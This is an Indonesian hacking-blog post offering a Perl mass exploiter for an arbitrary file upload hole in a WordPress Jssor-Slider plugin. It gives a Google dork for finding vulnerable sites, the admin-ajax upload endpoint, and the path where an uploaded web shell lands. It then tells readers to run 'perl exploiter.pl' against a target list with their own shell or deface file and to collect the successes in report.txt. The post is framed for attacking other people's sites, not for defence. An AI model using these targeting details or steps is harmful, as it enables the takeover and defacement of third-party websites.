» » WordPress Jssor-Slider Library Plugin Arbitrary Exploiter

WordPress Jssor-Slider Library Plugin Arbitrary Exploiter

03:21

###########################################################################

 # Exploit Title : WordPress DrcSystems EthicSolutions Jssor-Slider Library Plugin Arbitrary File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
#Reference : https://cxsecurity.com/issue/WLB-2018060226
# CWE : CWE-284 [ Improper Access Control ] -  CWE-862  [ Missing Authorization ]
#Dork : inurl:/wp-content/jssor-slider
#Exploit : http://[PATH]/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
#Shell Path : http://[PATH]//wp-content/jssor-slider/jssor-uploads/shell.txt
#Download Exploiter : Alternatif1   Alternatif2

 ###########################################################################

Jangan lupa download dulu exploiternya simpan dengan extensi *.pl (perl), okeh langsung saja.
Pertama jalankan program exploiternya kemudian masukan nama file list target dan shell / file deface kamu seperti dibawah ini. Dengan mengetikan perintah pada terminal:
cmd:\path>perl exploiter.pl


Selanjutnya tinggal tunggu saja exploiter bekerja dan lihat keterangan yang diberikan program.


Jika shell berhasil terupload maka akan auto tersimpak ke dalam file  report.txt .


Cukup sekian dan terimakasih mohon maaf bila ada kesalahan.

BAGIKAN:

Subscribe To Get Best Articles!

Jika menurut kalian artikel di blog ini berkualitas dan bermanfaat, silahkan berlangganan artikel terbaru melalui pesan masuk email anda secara gratis.

No comments:

Post a Comment

" Terimakasih telah mengunjungi blog kami ,, silahkan tinggalkan komentar untuk menghargai jerit payah penulis ^_^ "

Subscribe to: Post Comments ( Atom)